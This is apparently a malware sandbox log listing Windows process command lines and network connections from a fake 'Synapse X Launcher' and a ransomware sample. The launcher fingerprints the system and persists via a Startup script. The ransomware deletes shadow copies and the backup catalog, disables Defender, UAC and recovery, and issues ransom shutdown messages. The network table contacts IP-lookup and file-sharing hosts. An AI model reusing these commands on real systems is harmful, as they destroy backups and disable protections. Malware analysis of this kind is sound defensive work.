"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5160 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=3124 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=4772 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5184 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x150 0x494
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4940 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=5404 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=3188 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5824 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6040 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=6084 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=5960 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6188 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Synapse\" -spe -an -ai#7zMap28849:76:7zEvent22372
C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe
"C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe"
C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe
"C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2> nul
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "=""
C:\Windows\system32\tasklist.exe
TASKLIST /FI "STATUS eq RUNNING"
C:\Windows\system32\find.exe
find /V "Image Name"
C:\Windows\system32\find.exe
find /V "="
C:\Windows\SYSTEM32\attrib.exe
attrib +H "C:\Users\Admin\Downloads\Synapse\Synapse X Launcher.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get uuid
C:\Windows\System32\Wbem\wmic.exe
wmic path softwarelicensingservice get OA3xOriginalProductKey
C:\Users\Admin\Downloads\Synapse\Patcher.exe
"C:\Users\Admin\Downloads\Synapse\Patcher.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat
C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe"
C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2> nul
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2> nul
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "=""
C:\Windows\system32\tasklist.exe
TASKLIST /FI "STATUS eq RUNNING"
C:\Windows\system32\find.exe
find /V "Image Name"
C:\Windows\system32\find.exe
find /V "="
C:\Windows\SYSTEM32\attrib.exe
attrib +H "C:\Users\Admin\AppData\Local\Temp\Synapse X Launcher.exe"
C:\Windows\System32\Wbem\wmic.exe
wmic csproduct get uuid
C:\Windows\System32\Wbem\wmic.exe
wmic path softwarelicensingservice get OA3xOriginalProductKey
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=6164 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=5416 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5456 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5672 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=2652 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=3300 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=5532 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1464 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6140 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6408 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Users\Admin\Downloads\VC_redist.x64.exe
"C:\Users\Admin\Downloads\VC_redist.x64.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6488 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Windows\Temp\{28C2D7A4-FF25-481F-83BA-E14CC69E1AE7}\.cr\VC_redist.x64.exe
"C:\Windows\Temp\{28C2D7A4-FF25-481F-83BA-E14CC69E1AE7}\.cr\VC_redist.x64.exe" -burn.clean.room="C:\Users\Admin\Downloads\VC_redist.x64.exe" -burn.filehandle.attached=564 -burn.filehandle.self=560
C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe
"C:\Windows\Temp\{E11A2202-3380-471E-8BB5-E36088F32B02}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{2738ABA1-27DA-4E9E-B44A-A526DE1DFE84} {90B3FE9F-47E3-437B-AE33-370ECB166255} 2724
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -uninstall -quiet -burn.related.upgrade -burn.ancestors={c649ede4-f16a-4486-a117-dcc2f2a35165} -burn.filehandle.self=1100 -burn.embedded BurnPipe.{5866C52B-8439-40CA-A11C-CB89A98A2158} {EAA41EBB-D1D8-46A3-9F01-0E3875E0FD73} 1112
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.clean.room="C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -burn.filehandle.attached=544 -burn.filehandle.self=564 -uninstall -quiet -burn.related.upgrade -burn.ancestors={c649ede4-f16a-4486-a117-dcc2f2a35165} -burn.filehandle.self=1100 -burn.embedded BurnPipe.{5866C52B-8439-40CA-A11C-CB89A98A2158} {EAA41EBB-D1D8-46A3-9F01-0E3875E0FD73} 1112
C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe
"C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{26A52D87-4D8E-4056-881C-149783083089} {55FAA5F6-175E-44FE-B59C-0272A389FF4D} 5980
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\testy.jpg" /ForceBootstrapPaint3D
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=5676 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=5136 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6468 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6048 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat" "
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6120 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5548 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6360 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1640 --field-trial-handle=1888,i,3232798351337906311,3084994078428998403,131072 /prefetch:8
C:\Users\Admin\Desktop\ScaryInstaller.exe
"C:\Users\Admin\Desktop\ScaryInstaller.exe"
C:\Users\Admin\Desktop\TrojanRansomCovid29.exe
"C:\Users\Admin\Desktop\TrojanRansomCovid29.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\63FF.tmp\TrojanRansomCovid29.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\63FF.tmp\fakeerror.vbs"
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 2
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\68B2.tmp\creep.cmd" "
C:\Users\Admin\AppData\Local\Temp\63FF.tmp\mbr.exe
mbr.exe
C:\Users\Admin\AppData\Local\Temp\63FF.tmp\Cov29Cry.exe
Cov29Cry.exe
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\SysWOW64\PING.EXE
ping localhost -n 9
C:\Users\Admin\AppData\Local\Temp\68B2.tmp\CreepScreen.exe
CreepScreen.exe
C:\Windows\SysWOW64\timeout.exe
timeout 5 /nobreak
C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\68B2.tmp\melter.exe
melter.exe
C:\Windows\SysWOW64\timeout.exe
timeout 10 /nobreak
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im explorer.exe
C:\Users\Admin\AppData\Local\Temp\63FF.tmp\Cov29LockScreen.exe
Cov29LockScreen.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CreepScreen.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im melter.exe
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\68B2.tmp\scarr.mp4"
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
C:\Windows\SysWOW64\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\net.exe
net user Admin /fullname:"IT'S TOO LATE!!!"
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
C:\Windows\SysWOW64\timeout.exe
timeout 8 /nobreak
C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
Network
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| IE | 209.85.203.84:443 | accounts.google.com | tcp |
| US | 185.199.108.133:443 | user-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | e2c38.gcp.gvt2.com | udp |
| AU | 35.213.232.93:443 | e2c38.gcp.gvt2.com | tcp |
| AU | 35.213.232.93:443 | e2c38.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 93.232.213.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| GB | 172.217.169.35:443 | beacons.gvt2.com | tcp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| GB | 142.250.200.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | rr2---sn-aigl6nz7.googlevideo.com | udp |
| GB | 74.125.168.103:443 | rr2---sn-aigl6nz7.googlevideo.com | udp |
| US | 8.8.8.8:53 | 103.168.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.200.46:443 | google.com | udp |
| US | 8.8.8.8:53 | beacons3.gvt2.com | udp |
| GB | 172.217.169.67:443 | beacons3.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons3.gvt2.com | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | sharetext.me | udp |
| US | 172.67.191.176:443 | sharetext.me | tcp |
| IE | 209.85.203.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | 176.191.67.172.in-addr.arpa | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | api.anonfiles.com | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| QA | 34.124.82.3:443 | beacons2.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| GB | 142.250.200.46:443 | google.com | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.82.124.34.in-addr.arpa | udp |
| QA | 34.124.82.3:443 | beacons2.gvt2.com | udp |
| GB | 142.250.200.3:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | | tcp |
| N/A | 127.0.0.1:7000 | | tcp |
| QA | 34.124.82.3:443 | beacons2.gvt2.com | udp |
